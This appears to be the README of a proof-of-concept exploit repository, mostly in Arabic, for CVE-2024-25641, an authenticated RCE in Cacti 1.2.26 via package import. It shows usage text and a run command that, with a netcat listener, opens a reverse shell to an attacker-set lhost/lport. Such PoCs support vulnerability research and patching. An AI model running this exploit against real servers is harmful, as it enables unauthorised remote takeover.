
إثبات مفهوم لاستغلال CVE-2024-25641، وهو تنفيذ تعليمات برمجية عن بُعد (RCE) مُصادق عليه في Cacti 1.2.26 عبر ميزة استيراد الحزم، مما يتيح تنفيذ كود PHP تعسفي وفتح قشرة عكسية.
# Exploit Title: Cacti 1.2.26 - RCE (Authenticated)
# Date: 06/01/2025
# Exploit Author: D3Ext
# Vendor Homepage: https://cacti.net/
# Software Link: https://github.com/Cacti/cacti/archive/refs/tags/release/1.2.26.zip
# Version: 1.2.26
# Tested on: Kali Linux 2024
# CVE: CVE-2024-25641
يحتوي هذا المستودع على POC (إثبات المفهوم) لثغرة CVE-2024-25641، والتي تؤثر على إصدار Cacti 1.2.26. هذه الثغرة قابلة للاستغلال من خلال ميزة "Package Import"، وتسمح للمستخدمين المصادق عليهم الذين يمتلكون صلاحية "Import Templates" بتنفيذ كود PHP تعسفي على خادم الويب. تقع الثغرة داخل الدالة import_package() المعرّفة في سكربت /lib/import.php. يستخدم هذا الاستغلال قشرة PHP عكسية (reverse shell) يتم تشغيلها بمجرد رفع الإضافة الخبيثة.
usage: exploit.py [-h] --url URL --user USER --password PASSWORD --lhost LHOST --lport LPORT [--verbose]
CVE-2024-25641 - Cacti 1.2.26 Authenticated RCE
options:
-h, --help show this help message and exit
--url URL URL of the Cacti web root
--user USER username to log in
--password PASSWORD password of the username
--lhost LHOST local host to receive the reverse shell
--lport LPORT local port to receive the reverse shell
--verbose enable verbose
قم بتشغيل مستمع netcat ثم نفّذ الاستغلال بهذه الطريقة:
python3 exploit.py --url <URL> --user <username> --password <password> --lhost <local_host> --lport <local_port>

https://github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88
https://nvd.nist.gov/vuln/detail/CVE-2024-25641
https://vuldb.com/?id.263978
https://github.com/5ma1l/CVE-2024-25641
https://github.com/Safarchand/CVE-2024-25641
هذا المشروع مرخّص بموجب MIT
حقوق النشر © 2025، D3Ext